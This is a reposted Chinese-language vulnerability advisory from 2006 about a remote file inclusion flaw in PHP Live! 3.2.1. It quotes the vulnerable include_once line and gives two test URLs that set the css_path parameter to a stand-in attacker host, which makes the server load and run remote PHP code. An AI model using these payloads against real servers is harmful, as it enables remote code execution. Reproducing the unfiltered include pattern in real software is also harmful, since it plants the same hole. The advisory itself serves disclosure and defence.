[转载]PHP Live css_path远程文件包含漏洞
信息来源:绿盟科技发布日期:2006-07-24
更新日期:2006-07-25
受影响系统:
OSI Codes Inc PHP Live! 3.2.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19116
PHP Live!是一种构架于PHP、MySQL之上的开源软件,可为企业用户提供实时交谈服务。
PHP Live!没有正确过滤对help.php和setup/header.php文件的css_path参数的输入,允许远程攻击者通过包含本地和外部资源导致执行任意PHP代码。
漏洞代码如下:
<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" : $css_path ; include_once( $css_path."css/default.php" ) ; ?>
<*来源:magnific ([email]aneurysm_inc@hotmail.com[/email])
链接:[url]http://milw0rm.com/exploits/2060[/url]
[url]http://secunia.com/advisories/21158/print/[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker
建议:
--------------------------------------------------------------------------------
厂商补丁:
OSI Codes Inc
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://www.phplivesupport.com/[/url]
页:
[1]